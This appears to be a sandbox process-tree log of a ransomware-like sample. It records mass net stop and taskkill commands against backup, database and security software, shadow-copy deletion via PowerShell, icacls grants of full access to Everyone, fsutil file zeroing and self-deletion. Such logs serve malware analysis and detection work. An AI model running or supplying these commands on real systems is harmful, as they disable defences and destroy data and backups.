C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamEnterpriseManagerSvc /y3⤵PID:2632
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MBEndpointAgent /y2⤵PID:3804
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MBEndpointAgent /y3⤵PID:3644
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQLSERVER /y2⤵PID:3820
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLSERVER /y3⤵PID:1372
-
-
-
C:\Windows\system32\net.exe"net.exe" stop ARSM /y2⤵PID:2588
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ARSM /y3⤵PID:2944
-
-
-
C:\Windows\system32\net.exe"net.exe" stop “Sophos MCS Client” /y2⤵PID:3824
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos MCS Client” /y3⤵PID:3672
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSOLAP$TPSAMA /y2⤵PID:3476
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSOLAP$TPSAMA /y3⤵PID:3084
-
-
-
C:\Windows\system32\net.exe"net.exe" stop AcrSch2Svc /y2⤵PID:3468
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop AcrSch2Svc /y3⤵PID:3236
-
-
-
C:\Windows\system32\net.exe"net.exe" stop “Sophos MCS Agent” /y2⤵PID:3456
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos MCS Agent” /y3⤵PID:1060
-
-
-
C:\Windows\system32\net.exe"net.exe" stop msexchangeadtopology /y2⤵PID:3424
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop msexchangeadtopology /y3⤵PID:3268
-
-
-
C:\Windows\system32\net.exe"net.exe" stop “aphidmonitorservice” /y2⤵PID:3404
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “aphidmonitorservice” /y3⤵PID:1496
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSOLAP$TPS /y2⤵PID:3376
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSOLAP$TPS /y3⤵PID:2216
-
-
-
C:\Windows\system32\net.exe"net.exe" stop “Zoolz 2 Service” /y2⤵PID:3360
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Zoolz 2 Service” /y3⤵PID:2144
-
-
-
C:\Windows\system32\net.exe"net.exe" stop ReportServer$TPSAMA /y2⤵PID:3312
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ReportServer$TPSAMA /y3⤵PID:1896
-
-
-
C:\Windows\system32\net.exe"net.exe" stop “Sophos Health Service” /y2⤵PID:3304
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos Health Service” /y3⤵PID:828
-
-
-
C:\Windows\system32\net.exe"net.exe" stop AcronisAgent /y2⤵PID:3288
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop AcronisAgent /y3⤵PID:112
-
-
-
C:\Windows\system32\net.exe"net.exe" stop AcrSch2Svc /y2⤵PID:3272
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop AcrSch2Svc /y3⤵PID:2536
-
-
-
C:\Windows\system32\net.exe"net.exe" stop BackupExecRPCService /y2⤵PID:3240
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecRPCService /y3⤵PID:3320
-
-
-
C:\Windows\system32\net.exe"net.exe" stop BackupExecManagementService /y2⤵PID:3088
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecManagementService /y3⤵PID:1980
-
-
-
C:\Windows\system32\net.exe"net.exe" stop BackupExecJobEngine /y2⤵PID:3152
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecJobEngine /y3⤵PID:3120
-
-
-
C:\Windows\system32\net.exe"net.exe" stop IISAdmin /y2⤵PID:2968
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop IISAdmin /y3⤵PID:3604
-
-
-
C:\Windows\system32\net.exe"net.exe" stop VeeamDeploySvc /y2⤵PID:1880
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamDeploySvc /y3⤵PID:3620
-
-
-
C:\Windows\system32\net.exe"net.exe" stop VeeamRESTSvc /y2⤵PID:1328
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamRESTSvc /y3⤵PID:2792
-
-
-
C:\Windows\system32\net.exe"net.exe" stop UI0Detect /y2⤵PID:2744
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop UI0Detect /y3⤵PID:1296
-
-
-
C:\Windows\system32\net.exe"net.exe" stop W3Svc /y2⤵PID:3608
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop W3Svc /y3⤵PID:2680
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MySQL80 /y2⤵PID:764
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MySQL80 /y3⤵PID:4056
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$PROD /y2⤵PID:2020
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$PROD /y3⤵PID:2060
-
-
-
C:\Windows\system32\net.exe"net.exe" stop BackupExecManagementService /y2⤵PID:3724
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecManagementService /y3⤵PID:2140
-
-
-
C:\Windows\system32\net.exe"net.exe" stop vapiendpoint /y2⤵PID:268
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop vapiendpoint /y3⤵PID:2640
-
-
-
C:\Windows\system32\net.exe"net.exe" stop mssql$vim_sqlexp /y2⤵PID:2804
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mssql$vim_sqlexp /y3⤵PID:3056
-
-
-
C:\Windows\system32\net.exe"net.exe" stop WRSVC /y2⤵PID:3188
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop WRSVC /y3⤵PID:3916
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SQLTELEMETRY$ECWDB2 /y2⤵PID:4060
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLTELEMETRY$ECWDB2 /y3⤵PID:3880
-
-
-
C:\Windows\system32\net.exe"net.exe" stop TrueKeyServiceHelper /y2⤵PID:2996
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop TrueKeyServiceHelper /y3⤵PID:2956
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SQLTELEMETRY /y2⤵PID:4044
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLTELEMETRY /y3⤵PID:3856
-
-
-
C:\Windows\system32\net.exe"net.exe" stop svcGenericHost /y2⤵PID:2684
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop svcGenericHost /y3⤵PID:2396
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SQLAgent$SQLEXPRESS /y2⤵PID:3792
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$SQLEXPRESS /y3⤵PID:3700
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SQLAgent$SOPHOS /y2⤵PID:3816
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$SOPHOS /y3⤵PID:2796
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SQLAgent$SQL_2008 /y2⤵PID:3756
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$SQL_2008 /y3⤵PID:3928
-
-
-
C:\Windows\system32\net.exe"net.exe" stop sophossps /y2⤵PID:2676
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop sophossps /y3⤵PID:2812
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SQLAgent$SHAREPOINT /y2⤵PID:2312
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$SHAREPOINT /y3⤵PID:3280
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SntpService /y2⤵PID:2112
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SntpService /y3⤵PID:2468
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SQLAgent$SBSMONITORING /y2⤵PID:3900
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$SBSMONITORING /y3⤵PID:2068
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SmcService /y2⤵PID:3920
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SmcService /y3⤵PID:3364
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SQLAgent$PROFXENGAGEMENT /y2⤵PID:1732
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$PROFXENGAGEMENT /y3⤵PID:4036
-
-
-
C:\Windows\system32\net.exe"net.exe" stop TmCCSF /y2⤵PID:2168
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop TmCCSF /y3⤵PID:4772
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SQLAgent$VEEAMSQL2012 /y2⤵PID:4012
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2012 /y3⤵PID:2628
-
-
-
C:\Windows\system32\net.exe"net.exe" stop swi_update_64 /y2⤵PID:2320
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop swi_update_64 /y3⤵PID:2264
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SQLAgent$VEEAMSQL2008R2 /y2⤵PID:2440
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y3⤵PID:2080
-
-
-
C:\Windows\system32\net.exe"net.exe" stop swi_update /y2⤵PID:744
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop swi_update /y3⤵PID:3316
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SQLAgent$TPSAMA /y2⤵PID:2444
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$TPSAMA /y3⤵PID:1220
-
-
-
C:\Windows\system32\net.exe"net.exe" stop swi_service /y2⤵PID:3956
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop swi_service /y3⤵PID:2940
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SQLAgent$TPS /y2⤵PID:2092
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$TPS /y3⤵PID:2512
-
-
-
C:\Windows\system32\net.exe"net.exe" stop swi_filter /y2⤵PID:2180
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop swi_filter /y3⤵PID:4620
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SQLAgent$SYSTEM_BGC /y2⤵PID:4000
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$SYSTEM_BGC /y3⤵PID:4764
-
-
-
C:\Windows\system32\net.exe"net.exe" stop DCAgent /y2⤵PID:1536
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop DCAgent /y3⤵PID:4628
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$SHAREPOINT /y2⤵PID:3264
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SHAREPOINT /y3⤵PID:4780
-
-
-
C:\Windows\system32\net.exe"net.exe" stop BackupExecVSSProvider /y2⤵PID:3192
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecVSSProvider /y3⤵PID:1688
-
-
-
C:\Windows\system32\net.exe"net.exe" stop AVP /y2⤵PID:3176
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop AVP /y3⤵PID:2456
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$SBSMONITORING /y2⤵PID:3452
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SBSMONITORING /y3⤵PID:4756
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$SBSMONITORING /2⤵PID:3032
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SBSMONITORING /3⤵PID:3048
-
-
-
C:\Windows\system32\net.exe"net.exe" stop BackupExecRPCService /y2⤵PID:3720
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecRPCService /y3⤵PID:1824
-
-
-
C:\Windows\system32\net.exe"net.exe" stop Antivirus /y2⤵PID:3000
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop Antivirus /y3⤵PID:3972
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$PROFXENGAGEMENT /y2⤵PID:1248
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$PROFXENGAGEMENT /y3⤵PID:3268
-
-
-
C:\Windows\system32\net.exe"net.exe" stop AcronisAgent /y2⤵PID:1716
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop AcronisAgent /y3⤵PID:2544
-
-
-
C:\Windows\system32\net.exe"net.exe" stop BackupExecJobEngine /y2⤵PID:3440
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecJobEngine /y3⤵PID:2888
-
-
-
C:\Windows\system32\net.exe"net.exe" stop “Sophos Web Control Service” /y2⤵PID:3736
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos Web Control Service” /y3⤵PID:3812
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$PRACTTICEBGC /y2⤵PID:3744
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$PRACTTICEBGC /y3⤵PID:748
-
-
-
C:\Windows\system32\net.exe"net.exe" stop BackupExecDeviceMediaService /y2⤵PID:3464
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecDeviceMediaService /y3⤵PID:3320
-
-
-
C:\Windows\system32\net.exe"net.exe" stop “Sophos System Protection Service” /y2⤵PID:2280
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos System Protection Service” /y3⤵PID:3964
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$PRACTICEMGT /y2⤵PID:3728
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$PRACTICEMGT /y3⤵PID:3392
-
-
-
C:\Windows\system32\net.exe"net.exe" stop BackupExecAgentBrowser /y2⤵PID:3716
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecAgentBrowser /y3⤵PID:556
-
-
-
C:\Windows\system32\net.exe"net.exe" stop “Sophos Safestore Service” /y2⤵PID:2664
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos Safestore Service” /y3⤵PID:2352
-
-
-
C:\Windows\system32\net.exe"net.exe" stop audioendpointbuilder /y2⤵PID:3144
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop audioendpointbuilder /y3⤵PID:3380
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$ECWDB2 /y2⤵PID:3708
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$ECWDB2 /y3⤵PID:2496
-
-
-
C:\Windows\system32\net.exe"net.exe" stop BackupExecAgentAccelerator /y2⤵PID:3372
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecAgentAccelerator /y3⤵PID:2300
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSExchangeSRS /y2⤵PID:2688
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSExchangeSRS /y3⤵PID:3532
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$BKUPEXEC /y2⤵PID:2704
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$BKUPEXEC /y3⤵PID:3824
-
-
-
C:\Windows\system32\net.exe"net.exe" stop Smcinst /y2⤵PID:3680
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop Smcinst /y3⤵PID:2816
-
-
-
C:\Windows\system32\net.exe"net.exe" stop McTaskManager /y2⤵PID:1056
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McTaskManager /y3⤵PID:3836
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSExchangeES /y2⤵PID:3244
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSExchangeES /y3⤵PID:2952
-
-
-
C:\Windows\system32\net.exe"net.exe" stop “Sophos Agent” /y2⤵PID:2636
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos Agent” /y3⤵PID:4204
-
-
-
C:\Windows\system32\net.exe"net.exe" stop “Sophos Message Router” /y2⤵PID:3328
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos Message Router” /y3⤵PID:1204
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SQLSafeOLRService /y2⤵PID:1060
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLSafeOLRService /y3⤵PID:4180
-
-
-
C:\Windows\system32\net.exe"net.exe" stop TrueKeyScheduler /y2⤵PID:2368
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop TrueKeyScheduler /y3⤵PID:3544
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SQLSERVERAGENT /y2⤵PID:3684
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLSERVERAGENT /y3⤵PID:3532
-
-
-
C:\Windows\system32\net.exe"net.exe" stop TrueKey /y2⤵PID:3572
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop TrueKey /y3⤵PID:2724
-
-
-
C:\Windows\system32\net.exe"net.exe" stop tmlisten /y2⤵PID:2144
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop tmlisten /y3⤵PID:4612
-
-
-
C:\Windows\system32\net.exe"net.exe" stop unistoresvc_1af40a /y2⤵PID:1900
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop unistoresvc_1af40a /y3⤵PID:3168
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SQLBrowser /y2⤵PID:2820
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLBrowser /y3⤵PID:3112
-
-
-
C:\Windows\system32\net.exe"net.exe" stop VeeamTransportSvc /y2⤵PID:2928
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamTransportSvc /y3⤵PID:4188
-
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mspub.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2088
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM sqlbrowser.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2104
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM sqlagent.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3196
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM oracle.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2452
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM ocssd.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1328
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM ocautoupds.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2460
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mysqld-opt.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3004
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM wordpad.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3204
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mysqld-nt.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3076
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM winword.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1600
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mydesktopservice.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2172
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM visio.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2284
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mydesktopqos.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1308
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM powerpnt.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2188
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM msftesql.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1260
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM tmlisten.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3864
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM outlook.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3240
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM msaccess.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1804
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM PccNTMon.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3020
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM onenote.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1092
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM isqlplussvc.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3108
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM Ntrtscan.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2876
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM xfssvccon.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2788
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM dbsnmp.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3028
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" IM thunderbird.exe /F2⤵
- Kills process with taskkill
PID:2968
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM zoolz.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3272
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mbamtray.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:788
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM infopath.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2772
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM ocomm.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3036
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM thebat64.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3424
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM dbeng50.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2316
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mspub.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:844
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM synctime.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2960
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2980
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mydesktopqos.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3832
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM sqlservr.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3672
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM tbirdconfig.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:816
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM sqlwriter.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3052
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM CNTAoSMgr.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2900
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM excel.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2756
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM encsvc.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2332
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM steam.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3848
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM thebat.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3152
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM agntsvc.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3068
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM firefoxconfig.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2340
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM sqbcoreservice.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2072
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mysqld.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2924
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mydesktopservice.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3140
-
-
C:\Windows\system32\net.exe"net.exe" stop OracleClientCache80 /y2⤵PID:2988
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop OracleClientCache80 /y3⤵PID:4240
-
-
-
C:\Windows\system32\icacls.exe"icacls" "C:*" /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:1596
-
-
C:\Windows\system32\icacls.exe"icacls" "D:*" /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:2588
-
-
C:\Windows\system32\icacls.exe"icacls" "Z:*" /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:2076
-
-
C:\Windows\system32\cmd.exe"cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”2⤵PID:4416
-
C:\Windows\system32\PING.EXEping 127.0.0.7 -n 33⤵
- Runs ping.exe
PID:4928
-
-
C:\Windows\system32\fsutil.exefsutil file setZeroData offset=0 length=524288 “%s”3⤵PID:2396
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe2⤵
- Deletes itself
PID:4532 -
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:4940
-
-
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1636551212-1266287104-822813800-98311428-196427894140815446814422113551754271941"1⤵PID:2276
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-2054833826-14539570981102611895-12233735201283289726982977507-1388334462-555942388"1⤵PID:3932
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1288673606-55754014416893537168356098451322869730199056501016907272971013423111"1⤵PID:3916
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "2667766771658544216867272783090367751107385620-11047446091624717524-167210533"1⤵PID:3772
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1601151487116260328-1233741695-806835821-807132712268778195-75374821-1172833389"1⤵PID:3948
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "804074451211016537462084476-1187955022-770902415-1940665058-1730356025-1251735736"1⤵PID:3968
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1169565327-65661797-512732453-1539251933-1416122445-2461699651970748029-508714190"1⤵PID:4068
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1452519759-970472847-19056489381628962777-676477609198161362126297713297361077"1⤵PID:3908
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1606634943706862001626475380-127227446-540969102-112026500245093777-859055904"1⤵PID:3976
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "266568777276656101296219795-1667003497-618824940166122792919067095821435126808"1⤵PID:1296
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "867805884-989750394-635837554-1227826360-1078440563-9782995877984132981158007701"1⤵PID:3604
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-605740301-1821062139-1289511606183858309212242079781135360953-1661680505-1535982366"1⤵PID:3336
-
